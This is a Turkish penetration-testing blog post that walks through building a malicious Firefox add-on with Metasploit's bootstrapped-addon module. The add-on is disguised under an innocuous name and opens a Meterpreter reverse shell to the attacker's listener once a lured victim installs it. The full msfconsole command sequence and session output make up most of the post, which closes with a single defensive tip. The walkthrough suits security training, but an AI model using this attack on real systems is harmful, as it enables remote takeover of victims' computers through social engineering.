Daha önce, Pentest çalışmalarında sosyal mühendislik saldırısının önemini ve pratik olarak bir uygulamasını anlatan blog girdisi paylaşmıştık.
Bu blog girdisinse, benzer bir saldırı methodunu browser eklentileri aracılığıyla uygulamalı olarak gerçekleştireceğiz.
Senaryo:
Kurban, güncel bir Mozilla Firefox kullanmaktadır ve sistemi antivirus / firewall ile korunaklıdır. Hedefe Mozilla Firefox eklentisi olarak casus yazılım gönderilerek sistemi ele geçirmek amaçlanmaktadır.
Bu iş için, 2012-04-11 tarihinde “Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution” başlığı ile http://www.exploit-db.com/exploits/18730/ adresinde yayımlanan exploit kullanılacaktır.Bu yazı hazırlanırken en güncel Firefox 12.0 sürümü kullanılmıştır.
Uygulama
Metasploit ile “Firefox Pentest Eklentisi – Heryeri Hackler” başlıklı bir Mozilla Firefox eklentisi hazırlayacağız. Bu eklenti herhangi bir firefox browserına yüklendikden sonra hedef işletim sisteminde Meterpreter payloadını çalıştıracaktır.
#msfconsole
msf > search BootstrappedMatching Modules
================Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit(firefox_xpi_bootstrapped_addon) > show optionsModule options (exploit/multi/browser/firefox_xpi_bootstrapped_addon):
Name Current Setting Required Description
—- ————— ——– ———–
ADDONNAME HTML5 Rendering Enhancements yes The addon name.
AutoUninstall true yes Automatically uninstall the addon after payload execution
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:Id Name
— —-
1 Windows x86 (Native Payload)
msf exploit(firefox_xpi_bootstrapped_addon) > set ADDONNAME Firefox Pentest Eklentisi – Heryeri Hackler
ADDONNAME => Firefox Pentest Eklentisi – Heryeri Hackler
msf exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(firefox_xpi_bootstrapped_addon) > set URIPATH /
URIPATH => /
msf exploit(firefox_xpi_bootstrapped_addon) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(firefox_xpi_bootstrapped_addon) > set LHOST 1.1.1.1
LHOST => 1.1.1.1msf exploit(firefox_xpi_bootstrapped_addon) > set LPORT 4443
LPORT => 4443msf exploit(firefox_xpi_bootstrapped_addon) > exploit -j -z
[*] Exploit running as background job.[*] Started reverse handler on 1.1.1.1:4443
[*] Using URL:
[*] Local IP:
[*] Server started.
Bu aşamadan sonra ilgi çekici bir mesaj ile kurbanın bu firefox eklentisini yüklemesini sağlamalıdır. Kurban eklentiyi görüntülemek ve yüklemek istediğinde aşağıdaki gibi bir ekran görüntüsü ile karşılaşacaktır;
Saldırı başarılı olduğunda, meterpreter oturumu kurulacaktır;
[*] 5.5.5.5 firefox_xpi_bootstrapped_addon – Handling request…
[*] 5.5.5.5 firefox_xpi_bootstrapped_addon – Sending xpi and waiting for user to click ‘accept’…
[*] 5.5.5.5 firefox_xpi_bootstrapped_addon – Sending xpi and waiting for user to click ‘accept’…
[*] Sending stage (752128 bytes) to 5.5.5.5[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 5.5.5.5:62120) at 2012-05-06 01:35:41 +0300
msf exploit(firefox_xpi_bootstrapped_addon) > sessions -i 1
[*] Starting interaction with 1…meterpreter > getuid
Server username: LabsClient-PCLabsClient
Bu aşamadan sonra hedef sistem meterpreter ajanı ile yönetilebilir. Bu tür bir sosyal mühendislik saldırılarından korunmak için, browsera kaynağına güvenmediğiniz eklentileri kurmayınız.
Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr
